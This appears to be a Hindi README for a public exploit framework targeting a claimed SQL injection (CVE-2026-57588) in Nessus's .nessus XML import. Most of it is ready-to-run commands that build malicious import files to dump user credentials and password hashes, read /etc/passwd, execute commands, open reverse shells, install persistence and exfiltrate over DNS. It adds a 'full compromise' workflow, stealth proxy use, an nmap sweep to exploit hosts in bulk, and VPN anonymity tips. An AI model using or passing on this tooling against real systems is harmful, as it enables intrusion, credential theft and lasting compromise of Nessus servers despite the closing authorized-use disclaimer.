🛡️ CVE-2026-57588 - Nessus SQL इंजेक्शन एक्सप्लॉइटेशन फ्रेमवर्क
📋 विषय सूची
🔍 अवलोकन
CVE-2026-57588 Tenable Nessus संस्करण 10.12.0 और पूर्व में पाई गई एक गंभीर SQL इंजेक्शन कमजोरी है। यह कमजोरी .nessus स्कैन परिणाम फ़ाइलों को आयात करते समय XML पार्सिंग तंत्र में मौजूद है, जो आयात विशेषाधिकारों वाले प्रमाणित उपयोगकर्ताओं को बैकएंड PostgreSQL डेटाबेस के विरुद्ध मनमानी SQL क्वेरी निष्पादित करने की अनुमति देती है।
⚠️ कमजोरी विवरण
🔬 तकनीकी विवरण
यह कमजोरी XML टैग मानों के अपर्याप्त स्वच्छीकरण के कारण मौजूद है, जिन्हें आयात प्रक्रिया के दौरान SQL क्वेरी में शामिल किया जाता है। एक दुर्भावनापूर्ण अभिनेता XML टैग जैसे:
hostname
fqdn
os
system-type
mac-address
netbios-name
में विशेष रूप से तैयार SQL इंजेक्शन पेलोड वाली .nessus फ़ाइल बना सकता है।
जब कोई विशेषाधिकार प्राप्त उपयोगकर्ता दुर्भावनापूर्ण फ़ाइल आयात करता है, तो अस्वच्छीकृत मान PostgreSQL बैकएंड के विरुद्ध निष्पादित होते हैं, जिससे:
- डेटाबेस गणना
- डेटा चोरी
- कमांड निष्पादन
- फ़ाइल सिस्टम पहुँच
- स्थायित्व स्थापना
सक्षम होती है।
✨ विशेषताएं
सुविधा सूची देखने के लिए क्लिक करें
🎯 पेलोड प्रबंधन
- 13+ पेलोड प्रकार उद्देश्य के अनुसार वर्गीकृत
- टेम्पलेट-आधारित पेलोड निर्माण
- कस्टम पेलोड निर्माण और सत्यापन
- पैरामीटर सत्यापन और सिंटैक्स जाँच
- SQL सिंटैक्स सत्यापन
🚀 शोषण क्षमताएँ
- बहु-चरणीय शोषण समानांतर निष्पादन के साथ
- डेटाबेस पहचान और गणना
- डेटा चोरी कस्टम तालिका/स्तंभ चयन के साथ
- लक्ष्य प्रणाली पर कमांड निष्पादन
- फ़ाइल सिस्टम पहुँच और पठन
- रिवर्स शेल इंटरैक्टिव सत्र के साथ
- स्थायित्व स्थापना तंत्र
- समय-आधारित ब्लाइंड SQL इंजेक्शन
- बूलियन-आधारित ब्लाइंड SQL इंजेक्शन
- त्रुटि-आधारित SQL इंजेक्शन
- स्टैक्ड क्वेरीज़ उन्नत शोषण के लिए
- आउट-ऑफ-बैंड DNS चोरी
📊 रिपोर्टिंग और लॉगिंग
- HTML रिपोर्ट पेशेवर स्टाइलिंग के साथ
- मार्कडाउन रिपोर्ट दस्तावेज़ीकरण के लिए
- JSON रिपोर्ट स्वचालन के लिए
- टेक्स्ट रिपोर्ट त्वरित समीक्षा के लिए
- लॉग रोटेशन कई स्तरों के साथ
- विस्तृत निष्पादन आँकड़े
- फ़ाइल हैशिंग अखंडता सत्यापन के लिए
🛠️ उन्नत विशेषताएं
- कॉन्फ़िगरेबल जॉब्स के साथ
📦 स्थापना
🐍 पूर्वापेक्षाएँ
- Python 3.7 या उच्चतर
- pip (पायथन पैकेज मैनेजर)
- Git (वैकल्पिक, क्लोनिंग के लिए)
🔧 त्वरित स्थापना
# रिपॉजिटरी क्लोन करें
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
# वर्चुअल वातावरण बनाएं और सक्रिय करें
python3 -m venv venv
source venv/bin/activate # विंडोज़ पर: venv\Scripts\activate
# निर्भरताएँ स्थापित करें
pip install -r requirements.txt
# स्थापना सत्यापित करें
python3 exploit.py --version
🐳 डॉकर स्थापना
# डॉकर इमेज बनाएं
docker build -t nessus-exploit .
# टूल चलाएं
docker run -it --rm nessus-exploit generate -u https://test.com -p enum
📦 पैकेज स्थापना
# एक पैकेज के रूप में स्थापित करें
pip install -e .
# अब कहीं से भी चलाएं
nessus-exploit generate -u https://test.com -p enum
🚀 त्वरित शुरुआत
मूल उपयोग
# एक बुनियादी गणना शोषण उत्पन्न करें
python3 exploit.py generate -u https://test.com -p enum
# उन्नत बहु-चरणीय शोषण उत्पन्न करें
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus
# डेटाबेस से डेटा निकालें
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
कमांड सहायता
# सामान्य सहायता दिखाएं
python3 exploit.py --help
# generate कमांड सहायता दिखाएं
python3 exploit.py generate --help
# सभी उपलब्ध पेलोड सूचीबद्ध करें
python3 exploit.py list
💡 उपयोग उदाहरण
1. बुनियादी गणना
python3 exploit.py generate -u https://test.com -p enum
अपेक्षित आउटपुट
[2026-07-22 10:15:23] [INFO] [*] https://test.com के विरुद्ध शोषण शुरू
[2026-07-22 10:15:23] [INFO] [*] सत्र: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] पेलोड: enum
[2026-07-22 10:15:23] [INFO] [*] चरण निष्पादित: fingerprint
[2026-07-22 10:15:24] [INFO] [+] उत्पन्न XML: exploit_20260722_fingerprint_101523.nessus (3847 बाइट्स)
[2026-07-22 10:15:24] [INFO] [*] चरण निष्पादित: schema_dump
[2026-07-22 10:15:25] [INFO] [+] उत्पन्न XML: exploit_20260722_schema_dump_101524.nessus (4213 बाइट्स)
[2026-07-22 10:15:25] [INFO] [+] शोषण पूर्ण! अवधि: 2.15s
============================================================
शोषण सारांश
============================================================
लक्ष्य: https://test.com
स्थिति: सफल
अवधि: 2.15s
उत्पन्न फ़ाइलें: 3
उत्पन्न रिपोर्ट: 3
============================================================
2. उन्नत बहु-चरणीय शोषण
python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v
3. डेटा चोरी
# उपयोगकर्ता क्रेडेंशियल निकालें
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
# कस्टम स्तंभों के साथ निकालें
python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status
4. रिवर्स शेल
# श्रोता शुरू करें और शोषण उत्पन्न करें
python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus
5. कमांड निष्पादन
# बुनियादी कमांड निष्पादित करें
python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"
# जटिल कमांड निष्पादित करें
python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"
6. फ़ाइल पढ़ना
# सिस्टम फ़ाइलें पढ़ें
python3 exploit.py generate -u https://test.com -p file -f /etc/passwd
# एप्लिकेशन लॉग पढ़ें
python3 exploit.py generate -u https://test.com -p file -f /var/log/nessus/nessusd.log
7. समय-आधारित ब्लाइंड इंजेक्शन
# 5 सेकंड विलंब
python3 exploit.py generate -u https://test.com -p sleep -s 5
# भारी परीक्षण के लिए 30 सेकंड विलंब
python3 exploit.py generate -u https://test.com -p sleep -s 30
8. प्रॉक्सी समर्थन के साथ
# HTTP प्रॉक्सी
python3 exploit.py generate -u https://test.com -p advanced --proxy http://127.0.0.1:8080
# प्रमाणीकरण के साथ HTTPS प्रॉक्सी
python3 exploit.py generate -u https://test.com -p advanced --proxy https://user:[email protected]:8080
9. समानांतर निष्पादन
# 8 समानांतर कार्यों के साथ चलाएं
python3 exploit.py generate -u https://test.com -p advanced --jobs 8
# कस्टम टाइमआउट और पुनर्प्रयासों के साथ
python3 exploit.py generate -u https://test.com -p advanced --jobs 4 --timeout 60 --retries 5
10. वर्बोज़ और क्वाइट मोड
# वर्बोज़ मोड (विस्तृत आउटपुट)
python3 exploit.py generate -u https://test.com -p advanced -v --log-file debug.log
# क्वाइट मोड (न्यूनतम आउटपुट)
python3 exploit.py generate -u https://test.com -p advanced -q
📚 पेलोड प्रकार
श्रेणी: FINGERPRINTING
| पेलोड | विवरण | पैरामीटर |
|---|
fingerprint | डेटाबेस पहचान | कोई नहीं |
श्रेणी: UNION
| पेलोड | विवरण | पैरामीटर |
|---|
schema_dump | डेटाबेस स्कीमा डंप करें | कोई नहीं |
data_exfil | तालिका डेटा निकालें | table, columns |
श्रेणी: TIMING
| पेलोड | विवरण | पैरामीटर |
|---|
time_based | समय-आधारित ब्लाइंड इंजेक्शन | delay |
boolean_blind | बूलियन-आधारित ब्लाइंड | condition, delay |
श्रेणी: FILE_ACCESS
| पेलोड | विवरण | पैरामीटर |
|---|
file_read | सिस्टम फ़ाइलें पढ़ें | path, offset, length |
श्रेणी: COMMAND_EXEC
| पेलोड | विवरण | पैरामीटर |
|---|
command_exec | सिस्टम कमांड निष्पादित करें | command |
श्रेणी: REVERSE_SHELL
| पेलोड | विवरण | पैरामीटर |
|---|
reverse_shell | रिवर्स शेल स्थापित करें | host, port |
श्रेणी: PERSISTENCE
| पेलोड | विवरण | पैरामीटर |
|---|
persistence | स्थायित्व स्थापित करें | कोई नहीं |
श्रेणी: ERROR_BASED
| पेलोड | विवरण | पैरामीटर |
|---|
error_based | त्रुटि-आधारित इंजेक्शन | query |
श्रेणी: STACKED
| पेलोड | विवरण | पैरामीटर |
|---|
stacked_queries | स्टैक्ड क्वेरीज़ | query |
श्रेणी: OUT_OF_BAND
| पेलोड | विवरण | पैरामीटर |
|---|
oob_dns | DNS चोरी | host, data |
🎯 उन्नत परिदृश्य
परिदृश्य 1: पूर्ण समझौता वर्कफ़्लो
# चरण 1: डेटाबेस की गणना करें
python3 exploit.py generate -u https://test.com -p enum -v
# चरण 2: संवेदनशील डेटा निकालें
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
# चरण 3: स्थायित्व स्थापित करें
python3 exploit.py generate -u https://test.com -p persist
# चरण 4: रिवर्स शेल सेट करें
python3 exploit.py generate -u https://test.com -p shell -lp 4444
परिदृश्य 2: गुप्त संचालन
# प्रॉक्सी और क्वाइट मोड का उपयोग करके
python3 exploit.py generate -u https://test.com -p advanced \
--proxy http://127.0.0.1:8080 \
--no-ssl-verify \
-q \
-o stealth_scan.nessus
परिदृश्य 3: स्वचालित परीक्षण पाइपलाइन
#!/bin/bash
# auto_exploit.sh - स्वचालित शोषण स्क्रिप्ट
TARGET="https://test.com"
OUTPUT_DIR="./results_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT_DIR
# सभी पेलोड चलाएं
for payload in enum dump shell persist; do
echo "[*] पेलोड चल रहा है: $payload"
python3 exploit.py generate -u $TARGET -p $payload -o "$OUTPUT_DIR/${payload}_scan.nessus" -q
done
# व्यापक रिपोर्ट उत्पन्न करें
python3 exploit.py report -i "$OUTPUT_DIR" -o "$OUTPUT_DIR/final_report"
परिदृश्य 4: एंटरप्राइज़ सुरक्षा मूल्यांकन
# नेटवर्क-व्यापी मूल्यांकन
for target in $(nmap -p 8834 --open 192.168.1.0/24 | grep "Nessus" | awk '{print $5}'); do
echo "[*] परीक्षण: $target"
python3 exploit.py generate -u "https://$target" -p advanced -o "scan_${target}.nessus" -q
done
परिदृश्य 5: साक्ष्य संग्रह
# व्यापक साक्ष्य संग्रह करें
python3 exploit.py generate -u https://test.com -p advanced \
--file /etc/hosts \
--command "systemctl status nessusd" \
--table nessus_users \
--columns username,password_hash,email,last_login \
-v \
--log-file evidence.log
📊 रिपोर्टिंग
उपलब्ध रिपोर्ट प्रारूप
रिपोर्ट उत्पन्न करें
# सभी रिपोर्ट प्रारूप उत्पन्न करें
python3 exploit.py report -i results.json -o report
# केवल HTML रिपोर्ट उत्पन्न करें
python3 exploit.py report -i results.json -o report.html --format html
# मार्कडाउन रिपोर्ट उत्पन्न करें
python3 exploit.py report -i results.json -o report.md --format markdown
रिपोर्ट सामग्री
- लक्ष्य जानकारी
- सत्र ID और पेलोड प्रकार
- निष्पादन आँकड़े
- उत्पन्न फ़ाइलों की सूची
- अखंडता के लिए फ़ाइल हैश
- त्रुटि लॉग (यदि कोई हो)
- अस्वीकरण और चेतावनी
🔧 समस्या निवारण
सामान्य समस्याएँ और समाधान
समस्या 1: कनेक्शन त्रुटियाँ
# त्रुटि: कनेक्शन अस्वीकृत
# समाधान: जाँचें कि Nessus चल रहा है और पोर्ट सुलभ है
python3 exploit.py generate -u https://test.com:8834 -p enum
# त्रुटि: SSL प्रमाणपत्र सत्यापन विफल
# समाधान: SSL सत्यापन अक्षम करें
python3 exploit.py generate -u https://test.com -p enum --no-ssl-verify
समस्या 2: XML सत्यापन त्रुटियाँ
# त्रुटि: अमान्य XML संरचना
# समाधान: XML सत्यापन अक्षम करें
python3 exploit.py generate -u https://test.com -p enum --no-validate
समस्या 3: पेलोड त्रुटियाँ
# त्रुटि: आवश्यक पैरामीटर गायब
# समाधान: पेलोड आवश्यकताएँ जाँचें
python3 exploit.py validate -p command_exec
# फिर आवश्यक पैरामीटर प्रदान करें
python3 exploit.py generate -u https://test.com -p exec --command "whoami"
समस्या 4: अनुमति अस्वीकृत
# त्रुटि: फ़ाइलें नहीं लिख सकते
# समाधान: निर्देशिका अनुमतियाँ जाँचें
chmod 755 ./outputs/
python3 exploit.py generate -u https://test.com -p enum -o ./outputs/scan.nessus
समस्या 5: टाइमआउट मुद्दे
# त्रुटि: संचालन समय समाप्त
# समाधान: टाइमआउट बढ़ाएँ
python3 exploit.py generate -u https://test.com -p advanced --timeout 120
# या पुनर्प्रयासों का उपयोग करें
python3 exploit.py generate -u https://test.com -p advanced --retries 5
🔐 सुरक्षा संबंधी विचार
⚠️ महत्वपूर्ण चेतावनी
- कानूनी अनुपालन: केवल उन प्रणालियों पर उपयोग करें जिनके आप मालिक हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है
- डेटा सुरक्षा: निकाले गए क्रेडेंशियल और डेटा को अत्यधिक सावधानी से संभालें
- पृथक वातावरण: हमेशा पृथक प्रयोगशाला वातावरण में परीक्षण करें
- बैकअप: परीक्षण से पहले हमेशा डेटाबेस का बैकअप लें
- पुनर्स्थापन: परीक्षण के बाद सिस्टम को मूल स्थिति में पुनर्स्थापित करें
- दस्तावेज़ीकरण: अनुपालन के लिए सभी परीक्षण गतिविधियों का दस्तावेज़ीकरण करें
✅ सर्वोत्तम अभ्यास
- समर्पित परीक्षण खातों का उपयोग करें
- सभी कार्यों के विस्तृत लॉग रखें
- तृतीय पक्ष प्रणालियों का परीक्षण करते समय गुमनामी के लिए VPN/प्रॉक्सी का उपयोग करें
- जिम्मेदार प्रकटीकरण दिशानिर्देशों का पालन करें
- अपनी टीम को कमजोरी के बारे में शिक्षित करें
📝 लाइसेंस
यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
🤝 योगदान
योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें।
विकास सेटअप
# रिपॉजिटरी क्लोन करें
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
# विकास निर्भरताएँ स्थापित करें
pip install -r requirements-dev.txt
# परीक्षण चलाएं
pytest
# कोड फ़ॉर्मेट करें
black exploit.py
# लिंटिंग जाँचें
flake8 exploit.py
📞 सहायता
दस्तावेज़ीकरण
संपर्क
📄 परिवर्तन लॉग
संस्करण 1.0.0 (2026-07-22)
प्रारंभिक रिलीज
- ✅ व्यापक शोषण ढाँचा
- ✅ उद्देश्य के अनुसार वर्गीकृत 13 पेलोड प्रकार
- ✅ समानांतर निष्पादन के साथ बहु-चरणीय शोषण
- ✅ XML सत्यापन और स्कीमा जाँच
- ✅ कई रिपोर्ट प्रारूप (HTML, मार्कडाउन, JSON, टेक्स्ट)
- ✅ स्वचालित फ़ाइल हैशिंग और अखंडता सत्यापन
- ✅ रोटेशन के साथ पेशेवर लॉगिंग
- ✅ गुप्त संचालन के लिए प्रॉक्सी समर्थन
- ✅ इंटरैक्टिव सत्र के साथ रिवर्स शेल
- ✅ स्थायित्व तंत्र
- ✅ कमांड निष्पादन और फ़ाइल पढ़ना
- ✅ समय-आधारित और बूलियन-आधारित ब्लाइंड इंजेक्शन
- ✅ त्रुटि-आधारित और स्टैक्ड क्वेरी इंजेक्शन
- ✅ आउट-ऑफ-बैंड DNS चोरी
- ✅ डॉकर समर्थन
- ✅ क्रॉस-प्लेटफ़ॉर्म संगतता
⬆ शीर्ष पर वापस जाएं
⚠️ अस्वीकरण: यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। अनधिकृत उपयोग अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता।